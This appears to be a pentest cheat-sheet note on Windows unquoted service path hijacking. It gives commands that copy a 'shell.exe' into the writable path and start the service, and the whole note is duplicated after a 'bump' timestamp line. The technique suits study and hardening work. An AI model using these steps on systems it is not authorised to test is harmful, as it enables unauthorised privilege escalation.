killchain-compendium/exploit/windows/docs/unquoted_path.md

# Unquoted Path

* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
* Some part of path has to be writeable.
## Example
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
```sh
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
```
```sh
net start <service>
```
bump 2021-10-16 00:40:15 +02:00			`# Unquoted Path`

			`* Path to a service without quotes can be hijacked by inserting other executables and services into the path.`
			`* Some part of path has to be writeable.`
			`## Example`
			* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
			```sh
			`copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"`
			```
			```sh
			`net start <service>`
			```